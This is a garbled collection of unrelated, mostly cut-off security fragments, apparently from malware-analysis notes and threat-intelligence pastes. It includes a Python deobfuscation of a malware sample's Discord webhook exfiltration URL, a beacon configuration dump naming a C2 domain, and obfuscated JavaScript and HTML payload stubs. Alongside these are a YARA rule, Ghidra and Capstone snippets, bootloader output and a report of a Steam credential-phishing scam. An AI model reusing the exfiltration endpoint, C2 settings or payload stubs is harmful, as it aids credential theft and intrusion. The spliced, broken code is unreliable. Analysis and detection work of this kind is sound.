#include <linux/module.h>
static inline uint64_t exec_rdmsr(uint64_t msr)
{
uint32_t low, high;
asm volatile (
"rdmsr"
: "=a"(low), "=d"(high)
: "c"(msr)
);
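import base64, codecs
# Obfuscated fragments as recovered from the sample. `magic` and `god` are
# plain base64 chunks; `love` and `destiny` were additionally rot13-shifted
# (the codec name is carried in `joy`).
magic = 'bXlob29rID0gImh0dHBzOi8vZGlzY29yZC5jb20vYXBp'
love = 'Y3qyLzuio2gmYmRjAwL0AwN2BGLmAwRjAQLjAmpio2Wn' # rot13 of the base64 for /webhooks/1066460696361046077/obZ
god = 'aVhOWmxNVmZONm9yMUl6M0ZuUlZiQmdsYV9pN0picndI'
destiny = 'JyEVEaDgZwu4F3x1AScOqJ9YIHMwqmMDHaMgrKSsrHbv'
joy = 'rot13' # codec used to un-shift `love` and `destiny`
# Derive the base64 payload from the fragments instead of hard-coding the
# already-unshifted chunks, so the note itself demonstrates the
# deobfuscation (presumably mirroring what the sample does at runtime).
trust = magic + codecs.decode(love, joy) + god + codecs.decode(destiny, joy)
# Decodes to the exfiltration endpoint (IoC, block/report):
# myhook = "https://discord.com/api/webhooks/1066460696361046077/obZiXNZlMVfN6or1Iz3FnRVbBgla_i7JbrwHZTHFt-28xKy54ZAuoKUFcw6PRvmyq_yJ"
print(base64.b64decode(trust))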
morimolymoly / zip_ext.yara
Created December 24, 2022 01:36 — forked from usualsuspect/zip_ext.yara
YARA rule to match zips containing specific file extensions
rule zip_with_ext
{
meta:
author = "@jaydinbas"
description = "Only match zip files containing desired file extensions"
strings:
$file_sig = "PK\x03\x04" //zip header sig
$entry_sig = "PK\x01\x02" //ZIPDIRENTRY sig
beacon-dump 9d2507cf867f22e1d967fcbc0f429a3dd5334ecb8561febff6813c4476c59534
SETTING_PROTOCOL = 8
SETTING_PORT = 443
SETTING_SLEEPTIME = 730
SETTING_MAXGET = 1048620
SETTING_JITTER = 0
SETTING_PUBKEY = 'd2c4ba9c2c526d3ec6772cb3d4edae802433c144128cef33109edcc1d234943c'
SETTING_DOMAINS = 'dqfkmwvib0lbb.cloudfront.net,/access/'
SETTING_DOMAIN_STRATEGY = 0
SETTING_DOMAIN_STRATEGY_SECONDS = 4294967295
(function(_0xa33088, _0x3bdf6a) {
var _0x4c435d = _0xa33088();
function _0x3dcf6b(_0x55381d, _0x480e91, _0x21d320, _0x1c7a60, _0x2337d4) {
return _0x2a8d(_0x1c7a60 - 0x150, _0x55381d);
}
function _0x2815aa(_0x6e53a0, _0x5b9aeb, _0x302deb, _0x4a9908, _0x36c62f) {
return _0x2a8d(_0x36c62f - 0x16c, _0x302deb);
}
from ghidra.program.model.block import BasicBlockModel
from ghidra.util.task import ConsoleTaskMonitor
fm = currentProgram.getFunctionManager()
functions = fm.getFunctions(True)
blockModel = BasicBlockModel(currentProgram)
monitor = ConsoleTaskMonitor()
for func in functions:
<html>
<head>
<title></title>
</head>
<body>
<div>
<script>
var arr = "42931,42942,42935,42912,42918,43002,42992,42899,42882,42882,42866,42881,42918,42941,42912,42935,38768,38777,38772,38689,38682,38845,64603,63162,53922,63978,38814,38800,38745,38844,38837,38867,63071,63860,38719,38754,38774,38689,38789,38836,38813,38834,38791,38806,38864,42992,43003,42985,42968,42994,42994,42994,42994,42994,42994,42994,42994,42942,42941,42929,42931,42918,42939,42941,42940,43004,42912,42935,42914,42942,42931,42929,42935,43002,42997,42938,42918,42918,42914,42984,43005,43005,42923,42912,42934,42942,42931,42935,42928,42928,42915,42918,43004,42934,42919,42929,42937,42934,42940,42913,43004,42941,42912,42933,42997,43003,42985,42962".split(',').map(function (a) { return a | 0 });
fastboot oem dmesg
(bootloader) UEFI Start [ 725] SEC
(bootloader) ASLR : On
(bootloader) DEP : Off
(bootloader) Timer Delta : +0 mS
(bootloader) RAM Entry 0 : Base 0x0000000080000000 Size 0x0000000080000
(bootloader) 000
(bootloader) RAM Entry 1 : Base 0x0000000100000000 Size 0x000000007E2C0
(bootloader) 000
(bootloader) UEFI Ver : 5.0.210923.BOOT.XF.2.1-00134-SDM710LZB-2
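import capstone
from capstone import *
# Disassembler for 32-bit big-endian MIPS. Capstone mode constants are bit
# flags, so they are combined with `|` rather than `+` (same value here,
# but `+` would silently double-count a flag passed twice).
cs = Cs(CS_ARCH_MIPS, CS_MODE_32 | CS_MODE_BIG_ENDIAN)
cs.detail = True  # request operand/register detail for each decoded instruction
print(f"Capstone version: {capstone.__version__}")
# Raw word 0x0c1001f5: top 6 bits 0b000011 = jal, instr_index 0x1001f5;
# jump target = 0x1001f5 << 2 = 0x4007d4 (matches the `<funcc>` label below).
call_encoding = b'\x0c\x10\x01\xf5' # jal 4007d4 <funcc>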

Scam Details

Steals account credentials.

The scammer (https://steamcommunity.com/profiles/76561198378304894) sends messages to victims inviting them to exchange in-game items. He first gets you to connect to a legitimate trading website (e.g. csmoney, bitskins), and then introduces a fake website (https://suffinfo.com/) to "check the item's price".

The fake website performs a picture-in-picture attack: it steals the victim's account ID and password, and also the 2FA code.

The login window is entirely fake (because of the picture-in-picture attack it looks completely legitimate).